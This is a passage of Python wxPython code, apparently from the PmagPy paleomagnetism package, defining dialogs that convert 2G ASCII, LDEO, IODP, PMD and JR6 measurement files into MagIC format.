TEXT = \"Folder containing one or more 2g-ascii format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_specimen_ocn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl) # creates ok, cancel, help buttons and binds them to appropriate methods\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n #---button methods ---\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n WD = self.WD\n options_dict['dir_path'] = WD\n directory = self.bSizer0.return_value()\n options_dict['input_dir'] = directory\n if not directory:\n pw.simple_warning('You must select a directory containing 2g ascii files')\n return False\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).endswith('.asc') or str(f).endswith('.ASC')]\n if not files:\n pw.simple_warning('No .dat files found in {}'.format(directory))\n return False\n ID = \"-ID \" + directory\n if self.bSizer1.return_value():\n particulars = self.bSizer1.return_value()\n options_dict['gmeths'] = particulars\n mcd = '-mcd ' + particulars\n else:\n mcd = ''\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer3.return_value()\n options_dict['specnum'] = spc or 0\n if not spc:\n spc = '-spc 1'\n else:\n spc = '-spc ' + spc\n ocn = self.bSizer4.return_value()\n options_dict['or_con'] = ocn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n instrument = self.bSizer6.return_value()\n options_dict['inst'] = instrument\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n replicate = '-a'\n options_dict['noave'] = 0\n else:\n replicate = ''\n options_dict['noave'] = 1\n for f in files:\n file_2g_asc = f\n outfile = file_2g_asc + \".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_asc + \"_specimens.txt\"\n samp_outfile = file_2g_asc + \"_samples.txt\"\n site_outfile = file_2g_asc + \"_sites.txt\"\n loc_outfile = file_2g_asc + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_asc_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_asc, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_asc(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_asc(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_asc_magic.py -h\")\n\nclass convert_LDEO_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"LDEO format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 2 ---\n exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'Shaw method', 'IRM (acquisition)', 'NRM only', 'TRM acquisition', 'double AF demag', 'triple AF demag (GRM protocol)', 'Anisotropy experiment']\n self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n #---sizer 2a ---\n # add conditional boxsizer for Shaw experiments\n # if arm_labfield and trm_peakT are properly added into ldeo_magic\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---sizer 9 ----\n TEXT = \"peak AF field (mT) if ARM: \"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 10 ---\n TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 11 ---\n self.bSizer11 = pw.mass_or_volume_buttons(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1 = wx.BoxSizer(wx.HORIZONTAL)\n hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1.Add(self.bSizer10, flag=wx.ALIGN_LEFT)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER|wx.BOTTOM, border=20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n LDEO_file = self.bSizer0.return_value()\n if not LDEO_file:\n pw.simple_warning(\"You must provide a LDEO format file\")\n return False\n options_dict['magfile'] = LDEO_file\n magicoutfile=os.path.split(LDEO_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options_dict['meas_file'] = outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['spec_file'] = spec_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['samp_file'] = samp_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['site_file'] = site_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['loc_file'] = loc_outfile\n experiment_type = self.bSizer2.return_value()\n options_dict['codelist'] = experiment_type\n if experiment_type:\n experiment_type = \"-LP \" + experiment_type\n lab_field = self.bSizer3.return_value()\n if lab_field:\n options_dict['labfield'], options_dict['phi'], options_dict['theta'] = lab_field.split()\n lab_field = \"-dc \" + lab_field\n ncn = self.bSizer4.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer5.return_value()\n options_dict['specnum'] = spc or 0\n if spc:\n spc = \"-spc \" + spc\n else:\n spc = \"-spc 0\"\n loc_name = self.bSizer6.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n replicate = self.bSizer8.return_value()\n if replicate:\n replicate = \"\"\n options_dict['noave'] = 0 # do average\n else:\n replicate = \"-A\"\n options_dict['noave'] = 1 # don't average\n AF_field = self.bSizer9.return_value()\n options_dict['peakfield'] = AF_field or 0\n if AF_field:\n AF_field = \"-ac \" + AF_field\n coil_number = self.bSizer10.return_value()\n options_dict['coil'] = coil_number\n if coil_number:\n coil_number = \"-V \" + coil_number\n mv = self.bSizer11.return_value()\n options_dict['mass_or_vol'] = mv\n COMMAND = \"ldeo_magic.py -f {0} -F {1} -Fsp {2} -Fsa {3} -Fsi {4} -Flo {5} {6} {7} -ncn {8} {9} {10} {11} {12} {13} -mv {14}\".format(LDEO_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, experiment_type, lab_field, ncn, spc, loc_name, replicate, AF_field, coil_number, mv)\n # to run as module:\n program_ran, error_message = convert.ldeo(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.ldeo.__doc__)\n\n\nclass convert_IODP_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"IODP format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ---\n TEXT = \"IODP file type\"\n self.bSizer0a = pw.radio_buttons(pnl, ['SRM discrete', 'SRM section', 'JR6', 'KLY4S'], \"Format: \", wx.HORIZONTAL)\n self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format)\n\n #self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb1)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb2)\n\n #---sizer 0b ---\n TEXT = \"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the SRM discrete import.\"\n self.bSizer0b = pw.simple_text(pnl, TEXT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.site_lat_lon(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.replicate_measurements(pnl)\n\n #---sizer 3 ----\n #self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n self.bSizer3 = pw.labeled_text_field(pnl, 'Volume in cc, default is 7cc.')\n\n #---sizer 4 ---\n self.bSizer4 = pw.labeled_text_field(pnl, 'Depth Key, default is \"Depth CSF-B (m)\"')\n\n #---sizer 5 ---\n self.bSizer5 = pw.choose_file(pnl, 'add', method = self.on_add_samples_button,\n text=\"IODP samples data file downloaded from LIMS\")\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n # grey out what isn't initially needed\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n\n\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n wait = wx.BusyInfo(\"Please wait, working...\\nFor large files, this may take a few minutes\")\n wx.SafeYield()\n wd = self.WD\n full_file = self.bSizer0.return_value()\n ID, IODP_file = os.path.split(full_file)\n if not ID:\n ID = '.'\n fmt = self.bSizer0a.return_value()\n if not IODP_file:\n article = \"an\" if fmt[0] == \"S\" else \"a\"\n pw.simple_warning(\"You must provide {} {} file to convert\".format(article, fmt))\n return\n outfile = IODP_file + \".magic\"\n spec_outfile = IODP_file[:IODP_file.find('.')] + \"_specimens.txt\"\n samp_outfile = IODP_file[:IODP_file.find('.')] + \"_samples.txt\"\n site_outfile = IODP_file[:IODP_file.find('.')] + \"_sites.txt\"\n loc_outfile = IODP_file[:IODP_file.find('.')] + \"_locations.txt\"\n replicate = self.bSizer2.return_value()\n if replicate: # do average\n noave = 0\n else: # don't average\n noave = 1\n try: lat,lon = self.bSizer1.return_value().split()\n except ValueError: lat,lon = '',''\n volume = self.bSizer3.return_value()\n if not volume and fmt != 'KLY4S':\n volume = 7\n comp_depth_key = self.bSizer4.return_value()\n dc_field = self.bSizer4.return_value()\n instrument = self.bSizer4.return_value()\n samp_infile = self.bSizer5.return_value()\n\n # if sample file is available, run that conversion first\n if samp_infile:\n program_ran, error_message = convert.iodp_samples_csv(samp_infile)\n if program_ran:\n print('-I- samples are read in')\n else:\n print('-W ', error_message)\n pw.simple_warning(\"Couldn't read in {}. Trying to continue with next step.\".format(samp_infile))\n\n if fmt == 'SRM section': # SRM section\n COMMAND = \"convert.iodp_srm_lore({}, {}, {}, noave={}, comp_depth_key={}, meas_file={}, lat={}, lon={})\".format(IODP_file, wd, ID, noave, comp_depth_key, outfile, lat, lon)\n program_ran, error_message = convert.iodp_srm_lore(IODP_file, wd, ID, noave=noave,\n comp_depth_key=comp_depth_key,\n meas_file=outfile,\n lat=lat, lon=lon)\n elif fmt == 'SRM discrete': # SRM discrete\n COMMAND = \"convert.iodp_dscr_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, outfile)\n # check for needed specimens file\n if not os.path.exists(os.path.join(wd, \"specimens.txt\")):\n pw.simple_warning(\"You need to provide an IODP samples data file\")\n return\n program_ran, error_message = convert.iodp_dscr_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n elif fmt == \"JR6\":\n COMMAND = \"convert.iodp_jr6_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, dc_field={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, dc_field, outfile)\n program_ran, error_message = convert.iodp_jr6_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n dc_field=dc_field,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n print(\"convert JR6\")\n\n elif fmt == \"KLY4S\":\n COMMAND = \"convert.iodp_kly4s_lore({}, meas_out={}, spec_infile='specimens.txt', spec_out='kly4s_specimens.txt', instrument={}, actual_volume={}, dir_path={}, input_dir_path={})\".format(IODP_file, outfile, instrument, volume, wd, ID)\n program_ran, error_message = convert.iodp_kly4s_lore(IODP_file, meas_out=outfile, spec_infile='specimens.txt',\n spec_out='kly4s_specimens.txt', instrument=instrument,\n actual_volume=volume, dir_path=wd, input_dir_path=ID)\n print(\"convert KLY4S\")\n\n print(COMMAND)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n\n del wait\n\n def on_switch_format(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == \"SRM section\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Depth key and Volume below.\\nYou may optionally provide a samples data file.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Depth Key, default is \"Depth CSF-B (m)\"')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"SRM discrete\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the SRM discrete import.\")\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n elif fmt == \"JR6\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the JR6 import.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('DC field, default is 50e-6 ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"KLY4S\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Instrument name and actual specimen volume below (if known).\\nIf you haven't already imported a samples data file from LIMS, please do so below!\")\n self.bSizer3.label.SetLabel(\"Actual specimen volume\")\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Instrument name, default is IODP-KLY4S ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n\n\n self.hbox_all.Fit(self)\n\n\n def on_add_samples_button(self, event):\n text = \"choose sample file downloaded from LIMS\"\n pw.on_add_file_button(self.bSizer5, text)\n\n\n def on_helpButton(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == 'SRM section':\n pw.on_helpButton(text=convert.iodp_srm_lore.__doc__)\n elif fmt == 'SRM discrete':\n pw.on_helpButton(text=convert.iodp_dscr_lore.__doc__)\n elif fmt == 'JR6':\n pw.on_helpButton(text=convert.iodp_jr6_lore.__doc__)\n elif fmt == 'KLY4S':\n pw.on_helpButton(text=convert.iodp_kly4s_lore.__doc__)\n\n\n\nclass convert_PMD_files_to_MagIC(convert_files_to_MagIC):\n \"\"\" \"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"Folder containing one or more PMD format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_dir(pnl, 'add', method = self.on_add_dir_button)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ---\n # TEXT = \"specify number of characters to designate a specimen, default = 0\"\n # self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n self.bSizer3 = pw.specimen_n(pnl)\n\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n\n #---sizer 5 ----\n\n self.bSizer5 = pw.sampling_particulars(pnl)\n\n #---sizer 6 ---\n self.bSizer6 = pw.replicate_measurements(pnl)\n\n #---sizer 7 ---\n self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n TEXT=\"Demagnetization Method: t for thermal, af for AF demag (optional):\\nDemag type is automatically detected for files using the H or M labels\\nfor AF demag or the T label for thermal demag in step names.\"\n \n self.bSizer8 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options = {}\n WD = self.WD\n options['dir_path'] = WD\n directory = self.bSizer0.return_value() or '.'\n options['input_dir_path'] = directory\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).upper().endswith('.PMD')]\n if files:\n samp_outfile = files[0][:files[0].find('.')] + files[-1][:files[-1].find('.')] + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n else:\n #raise Exception(\"No pmd files found in {}, try a different directory\".format(WD))\n pw.simple_warning(\"No pmd files found in {}, try a different directory\".format(WD))\n ID = \"-ID \" + directory\n ncn = self.bSizer2.return_value()\n options['samp_con'] = ncn\n spc = self.bSizer3.return_value() or 0\n options['specnum'] = spc\n loc_name = self.bSizer4.return_value()\n options['location'] = loc_name\n dmg = self.bSizer8.return_value().lower() #Make lower case because the dmg options are t or af\n options['dmg'] = dmg\n if dmg != \"\" and dmg != \"t\" and dmg != \"af\":\n pw.simple_warning(\"The only valid demagnetization methods t and af, but program recieved: %s\"%dmg)\n return\n if loc_name:\n location = loc_name\n loc_name = \"-loc \" + loc_name\n particulars = self.bSizer5.return_value()\n options['meth_code'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n try: lat,lon = self.bSizer7.return_value().split()\n except ValueError: lat,lon = '',''\n options['lat'] = lat\n options['lon'] = lon\n lat = '-lat ' + lat\n lon = '-lat ' + lon\n replicate = self.bSizer6.return_value()\n if replicate:\n replicate = ''\n else:\n replicate = '-A'\n options['noave'] = 1 # don't average\n for f in files:\n options['mag_file'] = f\n outfile = f + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = f[:f.find('.')] + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = f[:f.find('.')] + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = f[:f.find('.')] + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = f[:f.find('.')] + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n COMMAND = \"pmd_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -dmg {} -ncn {} {} -spc {} {} {} {} {} {}\".format(WD, f, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, dmg, ncn, particulars, spc, replicate, ID, loc_name, lat, lon)\n\n program_ran, error_message = convert.pmd(**options)\n if not program_ran:\n pw.simple_warning(error_message)\n return False\n elif files.index(f) == len(files) -1:\n pw.close_window(self, COMMAND, outfile)\n else:\n print(\"Just ran equivalent of Python command: \", COMMAND)\n\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert.pmd.__doc__)\n\n\nclass convert_JR6_files_to_MagIC(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy JR6 file conversion\"\n\n def __init__(self, parent, WD):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n TEXT = \"JR6 format file (currently .txt format only)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ----\n TEXT = \"JR6 file Type\"\n label1 = \".txt format\"\n label2 = \".jr6 format\"\n self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n\n #---sizer 0b ---\n self.bSizer0b = pw.check_box(pnl, 'Joides Resolution')\n self.Bind(wx.EVT_CHECKBOX, self.on_check_joides, self.bSizer0b.cb)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, btn_text='add measurement file', method = self.on_add_file_button)\n\n #---sizer 1b ----\n TEXT=\"User (Optional):\"\n self.bSizer1b = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 1c ----\n TEXT=\"Expedition (i.e. 312)\"\n self.bSizer1c = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1c.ShowItems(False)\n\n #---sizer 1d ----\n TEXT=\"Hole name (i.e. U1456A)\"\n self.bSizer1d = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1d.ShowItems(False)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 1a ---\n self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n\n #---sizer 2 ---\n self.bSizer2 = pw.specimen_n(pnl)\n\n #---sizer 3 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name']\n 